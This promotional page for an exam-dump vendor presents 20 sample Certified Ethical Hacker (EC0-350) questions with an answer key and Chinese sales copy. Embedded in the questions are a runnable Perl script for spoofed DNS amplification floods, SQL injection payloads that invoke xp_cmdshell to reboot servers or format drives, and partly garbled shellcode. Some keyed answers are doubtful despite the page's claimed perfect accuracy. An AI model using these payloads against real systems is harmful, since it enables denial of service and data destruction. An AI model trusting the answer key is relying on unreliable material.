• EC0-350题库demo免费下载

    Filed under EC-COUNCIL
    Aug 3

    EC-COUNCIL认证EC0-350考试题库介绍

    考试代号: EC0-350
    问题数量:339 Q&As

    更新时间: 2009-09-09
    注册地点: Prometric/Pearson VUE
    题库全称:ethical hacking and countermeasures

    免费EC0-350题库Demo赏析

     
     
    Exam : EC-Council EC0-350
    Title : Ethical Hacking and Countermeasures

    1. Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive be able to get from the client before commencing his test?
    A. Only the IP address range
    B. Nothing but corporate name
    C. All that is available from the client
    D. IP Range, OS, and patches installed
    Answer: B

    2. Once an intruder has access to a remote system with a valid username and password, the attacker will attempt to increase his privileges by escalating the compromised account to one having increased privileges, such as that of an administrator. What would be the best countermeasure to protect against such escalation?
    A. Give users tokens
    B. Give users two passwords
    C. Give users a strong policy document
    D. Give user the least amount of privileges
    Answer: D

    3. A Hacker would typically use a botnet to send a large number of queries to open DNS servers. These queries will be "spoofed" to look like they come from the target of the flooding, and the DNS server will reply to that network address.
    It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the attacking machines, which are identifiable. But blocking queries from DNS servers brings problems in its wake. A DNS server has a valid role to play in the workings of the Internet. Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail or visiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger than the request.
    The following perl code can launch these attacks.
    use Net::DNS::Resolver;
    use Net::RawIP;
    open(LIST,"ns.list");
    @list=<LIST>;
    close LIST;
    chomp(@list);
    my $lnum=@list;
    my $i=0;
    my $loop=0;
    if ($ARGV[0] eq ”) {
    print "Usage: ./hackme.pl <target IP> <loop count>n";
    exit(0);
    }
    while($loop < $ARGV[1]) {
    while($i < $lnum) {
    my $source = $ARGV[0];
    my $dnspkt = new Net::DNS::Packet("google.com","ANY");
    my $pktdata = $dnspkt->data;
    my $sock = new Net::RawIP({udp=>{}});
    $sock->set({ip => { saddr => $source, daddr => $list[$i], frag_off=>0,tos=>0,id=>1565}, udp => {source => 53, dest => 53, data=>$pktdata} });
    $sock->send;
    $i++;
    }$loop++; $i=0;}
    exit(0);
    What type of attacks are these?
    A. DNS reflector and amplification attack
    B. DNS cache poisoning attacks
    C. DNS reverse connection attacks
    D. DNS forward lookup attacks
    Answer: A

    4. while attempting to discover the remote operating system on the target computer, you receive the following results from an nmap scan:
    Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )
    Interesting ports on 172.121.12.222:
    (The 1592 ports scanned but not shown below are in state: filtered)
    Port State Service
    21/tcp open ftp
    25/tcp open smtp
    53/tcp closed domain
    80/tcp open http
    443/tcp open http
    Remote operating system guess: Too many signatures match to reliably guess the OS.
    Nmap run completed — 1 IP address (1 host up) scanned in 277.483 seconds
    What would you do next to fingerprint the OS?
    A. Run an nmap scan with the -vv option
    B. Perform a tcp traceroute to the system using port 53
    C. Perform a Firewalk with that system as the target IP
    D. Connect to the active services and review the banner information
    Answer: D

    5. You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker?
    A. 5 minutes
    B. 23 days
    C. 200 years
    D. 16 million years
    Answer: A

    6. Travis works primarily from home as a medical transcriptionist. He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM. He uses voice recognition software to help him transfer what he dictates to electronic documents. The voice recognition software is processor intensive, which is why he bought the new computer. Travis frequently has to get on the Internet to do research on what he is working on. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to. Travis uses antivirus software, anti-spyware software, and always keeps the computer up-to-date with Microsoft patches.After another month of working on the computer, Travis?computer is even more noticeably slow. Every once in awhile, Travis also notices a window or two pop-up on his screen, but they quickly disappear. He has seen these windows show up, even when he has not been on the Internet. Travis is really worried about his computer because he spent a lot of money on it, and he depends on it to work. Travis scans his computer with all kinds of software, and cannot find anything out of the ordinary. Travis decides to go through Windows Explorer and check out the file system, folder by folder, to see if there is anything he can find. He spends over four hours pouring over the files and folders and cannot find anything. But, before he gives up, he notices that his computer only has about 10 GB of free space available. Since his hard drive is a 200 GB hard drive, Travis thinks this is very odd. ?
    Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer. According to his calculations, he should have around 150 GB of free space. What is mostly likely the cause of Travis?problems?
    A. Traviss computer is infected with stealth kernel level rootkit
    B. Traviss computer is infected with Stealth Trojan Virus
    C. Traviss computer is infected with Self-Replication Worm that fills the hard disk space
    D. Logic Bomb is triggered at random times creating hidden data consuming junk files
    Answer: A

    7. Jess the hacker runs L0phtCrack’s built-in sniffer utility that grabs SMB password hashes and stores them for offline cracking. Once cracked, these passwords can provide easy access to whatever network resources the user account has access to. But Jess is not picking up hashes from the network. Why?
    A. The physical network wire is on fibre optic cable
    B. The network protocol is configured to use IPSEC
    C. The network protocol is configured to use SMB Signing
    D. L0phtCrack SMB sniffing only works through Switches and not Hubs
    Answer: C

    8. Spears Technology, Inc is a software development company located in Los Angeles, California. They reported a breach in security, stating that its "security defenses has been breached and exploited for 2 weeks by hackers." The hackers had accessed and downloaded 90,000 addresses containing customer credit cards and passwords. Spears Technology found this attack to be so severe that they reported the attack to the FBI for a full investigation. Spears Technology was looking to law enforcement officials to protect their intellectual property.
    How did this attack occur? The intruder entered through an employees home machine, which was connected to Spears Technologys corporate VPN network. The application called BEAST Trojan was used in the attack to open a "back door" allowing the hackers undetected access. The security breach was discovered when customers complained about the usage of their credit cards without their knowledge.
    The hackers were traced back to Beijing, China through e-mail address evidence. The credit card information was sent to that same e-mail address. The passwords allowed the hackers to access Spears Technologys network from a remote location, posing as employees. The intent of the attack was to steal the source code for their VOIP system and "hold it hostage" from Spears Technology, in exchange for ransom.
    The hackers had intended on selling the stolen VOIP software source code to competitors.
    How would you prevent such attacks from occurring in the future at Spears Technology?
    A. Disable VPN access to all your employees from home machines
    B. Allow VPN access but replace the standard authentication with biometric authentication
    C. Replace the VPN access with dial-up modem access to the companys network
    D. Enable 25 character complex password policy for employees to access the VPN network
    Answer: A

    9. What hacking attack is challenge/response authentication used to prevent?
    A. Replay attacks
    B. Scanning attacks
    C. Session hijacking attacks
    D. Password cracking attacks
    Answer: A

    10. The United Kingdom (UK) has passed a law that makes hacking into an unauthorized network a felony.
    The law states:
    Section 1 of the Act refers to unauthorized access to computer material. This states that a person commits an offence if he causes a computer to perform any function with intent to secure unauthorized access to any program or data held in any computer. For a successful conviction under this part of the Act, the prosecution must prove that the access secured is unauthorized and that the suspect knew that this was the case. This section is designed to deal with common-or-garden hacking.
    Section 2 of the Act deals with unauthorized access with intent to commit or facilitate the commission of further offences. An offence is committed under Section 2 if a Section 1 offence has been committed and there is the intention of committing or facilitating a further offence (any offence which attracts a custodial sentence of more than five years, not necessarily one covered by the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1 offence is still committed.
    Section 3 offences cover unauthorized modification of computer material, which generally means the creation and distribution of viruses. For a conviction to succeed there must have been the intent to cause the modification, and knowledge that the modification had not been authorized.
    What is this law called?
    A. Computer Misuse Act 1990
    B. Computer Incident Act 2000
    C. Cyber Crime Law Act 2003
    D. Cyber Space Crime Act 1995
    Answer: A

    11. Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order to find some information about the target they are attempting to penetrate. How would you call this type of activity?
    A. Scanning
    B. CI Gathering
    C. Dumpster Diving
    D. Garbage Scooping
    Answer: C

    12. You are conducting pen-test against a companys website using SQL Injection techniques. You enter "anything’ or 1=1 ? in the username field of an authentication form. This is the output returned from the server.
    What is the next step to be done?
    A. Reboot the web server by running:
    http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell ‘iisreset -reboot’; –
    B. Identify the user context of the web application by running:
    http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = ‘dbo’
    C. Delete the database and format the C: drive by running:
    http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND drop database myDB; xp_cmdshell ‘format c: /q /yes ‘; –
    D. Identify the database and table name by running:
    http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=’U'),1))) > 109
    Answer: B

    13. What is the most common vehicle for social engineering attacks?
    A. Email
    B. Direct in person
    C. Local Area Networks
    D. Peer to Peer networks
    Answer: B

    14. while investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspects workstation. He comes across a file that is just called "file.txt" but when he opens it, he finds the following:
    #define MAKE_STR_FROM_RET(x) ((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)
    char infin_loop[]= /* for testing purposes */
    "xEBxFE";
    char bsdcode[] = /* Lam3rZ chroot() code by venglin */
    "x31xc0×50x50×50xb0×7excdx80×31xdbx31xc0×43"
    "x43×53x4bx53×53xb0×5axcdx80xebx77×5ex31xc0"
    "x8dx5ex01×88x46×04x66×68xffxffx01×53x53xb0"
    "x88xcdx80×31xc0×8dx5ex01×53x53xb0×3dxcdx80"
    "x31xc0×31xdbx8dx5ex08×89x43×02x31xc9xfexc9"
    "x31xc0×8dx5ex08×53x53xb0×0cxcdx80xfexc9×75"
    "xf1×31xc0×88x46×09x8dx5ex08×53x53xb0×3dxcd"
    "x80xfex0exb0×30xfexc8×88x46×04x31xc0×88x46"
    "x07×89x76×08x89×46x0cx89xf3×8dx4ex08×8dx56"
    "x0cx52×51x53×53xb0×3bxcdx80×31xc0×31xdbx53"
    "x53xb0×01xcdx80xe8×84xffxffxffxffx01xffxffx30"
    "x62×69x6ex30×73x68×31x2ex2ex31×31x76×65x6e"
    "x67×6cx69×6e";
    static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
    static char *magic_str=NULL;
    int before_len=0;
    What can he infer from this file?
    A. An encrypted file
    B. A uuencoded file
    C. A buffer overflow
    D. A picture that has been renamed with a .txt extension
    Answer: C

    15. What does this symbol mean?
    A. Open access point
    B. WPA encrypted access point
    C. WEP encrypted access point
    D. Closed access point
    Answer: A

    16. You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in footprinting the organization?
    A. The IP range used by the target network
    B. How strong the corporate security policy is
    C. The types of operating systems and applications being used
    D. An understanding of the number of employees in the company
    Answer: C

    17. Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the recommendations for securing the operating system and IIS. These servers are going to run numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is still concerned about the security of these servers because of the potential for financial loss. Bob has asked his companys firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network.Why will this not be possible?
    A. Firewalls cannot inspect traffic coming through port 443
    B. Firewalls can only inspect outbound traffic
    C. Firewalls cannot inspect traffic coming through port 80
    D. Firewalls cannot inspect traffic at all, they can only block or allow certain ports
    Answer: D

    18. Null sessions are un-authenticated connections (not using a username or password.) to an NT or 2000 system. Which TCP and UDP ports must you filter to check null sessions on your network?
    A. 137 and 139
    B. 137 and 443
    C. 139 and 443
    D. 139 and 445
    Answer: D

    19. You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permissions. You need to know what your privileges are within the shell. What are your current privileges?
    A. LocalSystem
    B. Administrator
    C. IUSR_COMPUTERNAME
    D. IIS default installation account
    Answer: A

    20. System administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup postings to glean insight into the makeup of a target network. How would you search for these posting using Google search?
    A. Search in Google using the key search strings "the target company" and "newsgroups"
    B. Search for the target company name at http://groups.google.com
    C. Use NNTP websites to search for these postings
    D. Search in Google using the key search strings "the target company" and "forums"
    Answer: B

    免费下载EC0-350题库Demo

    Examsoon提供最新的Certified Ethical Hacker认证 EC0-350题库,其全名为:(ethical hacking and countermeasures). 在您决定是否购买之前 可以先下载EC0-350题库的部分演示. Examsoon是全球唯一提供所有IT认证考试题库demo免费下载的厂商 ,以下为免费EC0-350模拟测试题的下载链接

    免费的EC0-350题库PDF下载链接

    EC-COUNCIL EC0-350学习指南

    Certified Ethical Hacker认证 EC0-350考试已经证明了它在全世界的广泛性和重要性,因此明白这项认证考试的世界各地的人必须具备与认证考试相关领域所需的技能和知识。EC-COUNCIL认证 EC0-350学习指南的目的是检查考生的能力和他对概念的意识。很多时候练习测试EC0-350考试都已经被修改过了,删掉了许多过时的东西,而那些需求是在考试课程。当应用到时候你所学的知识的时候,就会鉴定出你所学到的东西以及对所学知识的应用是多么的恰到好处。EC-COUNCIL认证 EC0-350是在IT行业的知名品牌,所以如果您通过了这样一个知名公司举行的一次考试,你可以想象你将来的事业会做的多么好。

    想要通过这个考试当然存在很多困难。你所要做的就是准备好充足的勇气和信心,而这些都来源与你平时训练的好坏.建议大家可以去Examsoon这个网站看一下,它的EC0-350考试是为了测试您在这方面的知识的掌握程度,最好的部分是它可以使你不断更新你所学的知识,不断进步。如果你知道所有的概念和如何使用他们的时候才是你真正掌握了Examsoon的用意。这门考试检查了您的能力和一旦你通过这次考验你将成为最优秀的人才,其他EC0-350考试的Examsoon结算值得注意的影响就是你的薪水将直线上升这大概也是每个人都希望获得的,所以要找一些好的资源才行。

    Examsoon考题大师EC0-350试题都是考试原题的完美组合,覆盖率95%以上,答案由多位专业资深讲师原版破解得出,正确率100%,只要您使用Examsoon的考试题库参加EC0-350考试,保证您一次轻松通过考试;

    售后服务第一!我们相信要想在当今时代取得成功,必须为广大用户提供全套的周到细致的全程优质售后服务,只有客户满意了,才能发展。客户至上是Examsoon考题大师的一贯宗旨;

Leave a Reply

You must be logged in to post a comment.

 

友情链接 | Examsoon IT 认证考试网 思科认证资源网 思科微軟考古題 IT證照模擬試題 考古題考試模擬軟件 70-649 70-643 70-646 640-802 640-863 e20-340 HP0-085 HP0-A25